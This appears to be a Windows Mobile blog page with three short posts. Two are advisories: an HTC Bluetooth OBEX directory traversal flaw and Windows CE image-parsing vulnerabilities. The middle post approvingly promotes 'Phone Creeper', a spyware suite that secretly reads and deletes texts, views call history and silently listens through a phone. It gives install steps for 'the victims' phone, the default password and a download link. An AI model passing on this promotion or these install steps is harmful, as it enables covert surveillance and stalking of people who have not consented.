by . Saijo on July 15, 2009
in News
Bluetooth Vulnerability
HTC devices running Windows Mobile 6 and Windows Mobile 6.1 are prone to a directory traversal vulnerability in the Bluetooth OBEX FTP Service. Exploiting this issue allows a remote authenticated attacker to list arbitrary directories, and write or read arbitrary files, via a ../ in a pathname. HTC handsets running Windows Mobile 5 are not affected. Users worried about the vulnerability should avoid pairing their phones with an untrusted handset or computer. They may also want to delete any devices that are already paired with their phones. Because the driver, obexfile.dll, is an HTC driver, only handsets from the company are affected. Apparently Windows Mobile 6.5 devices will be vulnerable too if HTC does not fix the driver according to Moreno Tablado, who discovered this Vulnerability.
[ via PC World ]
More info about the Vulnerability
Checkout Our Sponsors
by Mukku on June 22, 2009
in Uncategorized
No ScreenShot
Phone Creeper which the author describes an an Espionage Suite has been recently released by
chetstriker from xda-developers. I am thankful to the developer for pointing out such a vulnerability within the Windows Mobile operating system.
Currently it has the following features:
- secretly and remotely read incoming / outgoing sms
- secretly and remotely delete incoming / outgoing sms
- secretly and remotely view call history
- bounce sms messages off remote phone to someone else.
- create a pop-up message on phone
- send a secret fart sound
- secretly and remotely listen to person. (Initiates silent call back of person to your phone with thier speaker phone enabled)
- also send listening in call to somebody else’s phone
All results will be sent via SMS back without leaving any trace on the phone being controlled. Any cell phone can be used to initiate the commands and all commands will respond with a success message for acknowledgment.
Install Instructions :
Just install .cab on the victims wm5 or higher phone. THEN MAKE SURE YOU REBOOT TO INITIATE IT.
by default the password is “chetstriker“, obviously not including the quotes and BE SURE IT’S ALL IN LOWER CASE. The command format is (password and then command)
Download this Application
by Saijo George on May 28, 2008
in News
We dont usually find a lot of Security Vunerability on Mobile devices when compared to the desktop cousin but once in a while a few of them do surface.
A security vunerability for Windows CE posted in the US-CERT 
Cyber Security Bulletin.
Multiple unspecified vulnerabilities in the JPEG (GDI+) and GIF image processing in Microsoft Windows CE 5.0 allow remote attackers to execute arbitrary code via crafted JPEG and GIF images.
For more details see National Vulnerability Database (CVE-2008-2160)
And update is available from Microsoft here.
Source : 4winmobile.com
Checkout Our Sponsors
schlubadub
Nick
fatfingur
simphf
Hog
Richard Clubb
moe1up
Lee
Xmel
